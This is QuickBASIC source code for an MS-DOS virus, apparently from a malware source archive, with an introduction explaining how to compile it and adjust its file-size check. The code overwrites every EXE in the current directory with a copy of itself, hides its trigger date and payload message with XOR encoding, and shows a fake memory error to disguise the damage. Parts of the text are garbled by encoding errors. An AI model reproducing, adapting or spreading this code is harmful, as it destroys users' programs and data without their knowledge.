MalwareSourceCode/MSDOS/Q-Index/Virus.MSDOS.Unknown.qb.bas
vxunderground 4b9382ddbc re-organize
push
2022-08-21 04:07:57 -05:00

73 lines
2.8 KiB
QBasic
Raw Permalink Blame History

A QB Virus
Tis virus simply overwrites all the EXE's in the current DIR using DOS, it also uses a small assembly routine to "find itself" you must use QB 4.5 to compile it then after you compile (be sure to load QB with the /l switch) just run it, you may try using PKLITE on it and recording the new file size then changing the 43676 to whatever the new size is....
DEFINT A-Z
'$INCLUDE: 'qb.bi'
DECLARE FUNCTION ProgramName$ ()
SHELL "DIR /b *.exeé¨é"
OPEN "é¨é" FOR BINARY AS #1
IF LOF(1) = 0 THEN CLOSE : KILL "é¨é": GOTO endit
CLOSE
OPEN "é¨é" FOR INPUT AS #1
1 LINE INPUT #1, host$
GOSUB infect
endit:
crdate$ = "ÎËÓÏÍ"
FOR i = 1 TO LEN(crdate$)
cdate$ = cdate$ + CHR$(ASC(MID$(crdate$, i, 1)) XOR &HFE)
NEXT
IF MID$(DATE$, 1, 5) = cdate$ THEN GOSUB message
PRINT "Program to big to fit in memory"
END
infect:
OPEN host$ FOR BINARY AS #2
IF LOF(2) < 1200 OR LOF(2) = 43676 OR LOF(2) = 0 THEN CLOSE : GOTO 1
CLOSE
doit$ = "copy " + ProgramName$ + " " + host$ + "nul"
SHELL doit$
CLOSE : GOSUB endit
END
message:
CLS
FOR i = 1 TO 25 * 19.2
PRINT "&deg;&plusmn;&sup2;Û";
COLOR RND * 14 + 1
NEXT
DO: LOOP UNTIL INKEY$ < ""
CLS
PRINT
msg$ = "öîßÌËÙÔ<C399>ääð<C3A4>...î"<EFBFBD>œ""š<EFBFBD>ïÔ-<EFBFBD>ùÈÎÅÃÂ<EFBFBD>ýÅØÃÆ&sect;"
FOR i = 1 TO 37
PRINT CHR$(ASC(MID$(msg$, i, 1)) XOR &HAD);
NEXT
FUNCTION ProgramName$ STATIC
DIM Regs AS RegType 'Allocate space for TYPE
' RegType
Regs.ax = &H5100 'DOS function 51h
Interrupt &H21, Regs, Regs ' Get PSP Address
DEF SEG = Regs.bx 'Regs.bx returns PSP sgmnt.
EnvSeg% = PEEK(&H2C) + PEEK(&H2D) * 256 'Get environment address
DEF SEG = EnvSeg% 'Set environment address
DO
Byte% = PEEK(Offset%) 'Take a byte
IF Byte% = 0 THEN 'Items are ASCIIZ
Count% = Count% + 1 ' terminated
IF Count% AND EXEFlag% THEN 'EXE also ASCIIZ terminated
EXIT DO 'Exit at the end
ELSEIF Count% = 2 THEN 'Last entry in env. is
EXEFlag% = -1 ' terminated with two
Offset% = Offset% + 2 ' NULs. Two bytes ahead
END IF ' is the EXE file name.
ELSE 'If Byte% < 0, reset
Count% = 0 ' zero counter
IF EXEFlag% THEN 'If EXE name found,
Temp$ = Temp$ + CHR$(Byte%) ' build string
END IF
END IF
Offset% = Offset% + 1 'To grab next byte...
LOOP 'Do it again
DEF SEG 'Reset default segment
ProgramName$ = Temp$ 'Return value
Temp$ = "" 'Clean up
END FUNCTION